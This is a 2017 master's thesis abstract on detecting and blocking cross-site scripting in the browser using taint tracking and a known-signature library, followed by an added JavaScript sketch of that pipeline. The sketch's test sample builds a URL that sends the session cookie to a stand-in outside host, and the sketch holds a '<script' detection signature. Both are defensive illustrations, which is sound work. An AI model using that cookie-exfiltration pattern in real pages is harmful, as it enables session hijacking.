Research on Detection and Defense Techniques for Cross-Site Scripting Attacks
[Abstract]: With the development of Internet technology, Web applications have become increasingly widespread, and websites and application systems based on the B/S architecture keep emerging. To enhance the user experience, mainstream websites make full use of dynamic scripting languages such as JavaScript. This technology brings convenience to users, but a large number of security vulnerabilities and threats come with it. In today's Web application field, cross-site scripting (XSS) is one of the most serious and most common threats. The root of the attack is a flaw in the security mechanism of the Web application: user input is not sufficiently checked and filtered. Although the problem can be solved fundamentally on the server side by fixing the Web application, security patches are released slowly and system operators have weak security awareness, so when a cross-site scripting attack occurs there has often been no time to fix the vulnerability in the Web application, which leaves users operating at high risk. Therefore, to improve users' ability to defend themselves actively, it is very important to study defenses against cross-site scripting attacks on the user's client. After analyzing and discussing the commonly used detection and defense techniques for cross-site scripting attacks, this paper carries out research in the following two areas: (1) Based on a deep understanding of dynamic taint tracking and static taint analysis, a new method for detecting and defending against cross-site scripting attacks is proposed that is based on dynamic taint tracking and supplemented by static taint analysis. The method marks sensitive information in the current page and monitors how that information propagates within the page. When an abnormal operation is performed on the sensitive information, a danger warning is issued to the user, who decides how to handle it, so that the cross-site scripting attack is effectively intercepted. (2) Because the characteristics of known, common cross-site scripting attacks can be detected directly, signature-based detection of cross-site scripting attacks is introduced and a library of known cross-site scripting signatures is presented. After static taint analysis of the information input by the user, the suspicious taint sources in the analysis result are compared with the known signature library, and tainted information that is present in the library is filtered out directly. Combined with the results of the taint judgment, the known signature library can be updated continuously. This extended detection and defense technique greatly improves detection speed. For the concrete implementation, this paper takes the open-source Mozilla Firefox as the experimental platform and, through analysis of the browser's JavaScript engine, extends the processing at each stage of the browser. Experimental results show that the proposed method is feasible.
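The two-stage flow the abstract describes (signature filter on the input, then taint tracking of sensitive data, with the verdict fed back into the signature library), as an added JavaScript sketch that is not the thesis's Firefox implementation. All names (Tainted, concat, makePage, inspect, signatureLibrary) and the sample scripts are constructed for illustration; static taint analysis is reduced to a normalized-string comparison and the user prompt to an unconditional block.

```javascript
// Added sketch: all names and sample values are hypothetical / constructed.
const signatureLibrary = new Set(["<script"]); // known-signature library (constructed seed)
const normalize = (src) => src.toLowerCase().replace(/\s+/g, "");

// A value marked as sensitive, for example the page's session cookie.
class Tainted {
  constructor(value, label) { this.value = value; this.label = label; }
}

// Propagation rule: a string built from any tainted part stays tainted.
function concat(...parts) {
  const hit = parts.find((p) => p instanceof Tainted);
  const text = parts.map((p) => (p instanceof Tainted ? p.value : String(p))).join("");
  return hit ? new Tainted(text, hit.label) : text;
}

// Sink monitor: sensitive data leaving for another origin is the "abnormal operation".
function makePage(origin, cookie) {
  const page = { origin, cookie: new Tainted(cookie, "cookie"), warnings: [], sent: [] };
  page.send = (url) => {
    const text = url instanceof Tainted ? url.value : url;
    const dest = new URL(text).origin;
    if (url instanceof Tainted && dest !== origin) {
      page.warnings.push(`blocked: ${url.label} -> ${dest}`);
      return false; // the thesis warns the user; this sketch always blocks
    }
    page.sent.push(text);
    return true;
  };
  return page;
}

// Pipeline: signature filter first, dynamic tracking second, then learn from the verdict.
function inspect(script, page) {
  const key = normalize(script.source);
  if ([...signatureLibrary].some((sig) => key.includes(sig))) return "filtered-by-signature";
  script.run(page);
  if (page.warnings.length === 0) return "allowed";
  signatureLibrary.add(key); // update the known-signature library from the taint verdict
  return "blocked-by-taint-tracking";
}

// Constructed samples: `source` stands for the input text, `run` for its behaviour.
const leaky = {
  source: "beacon(OFFSITE_URL + sessionToken)",
  run: (page) => page.send(concat("https://collector.example/c?", page.cookie)),
};
const benign = {
  source: "beacon(SAME_SITE_URL + sessionToken)",
  run: (page) => page.send(concat("https://shop.example/api?", page.cookie)),
};
```

The first inspection of `leaky` is caught by taint tracking and adds its normalized text to the library, so a second inspection is rejected by the signature check without being run.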
[Degree-granting institution]: Lanzhou University of Technology
[Degree level]: Master's
[Year degree granted]: 2017
[Classification number]: TP393.08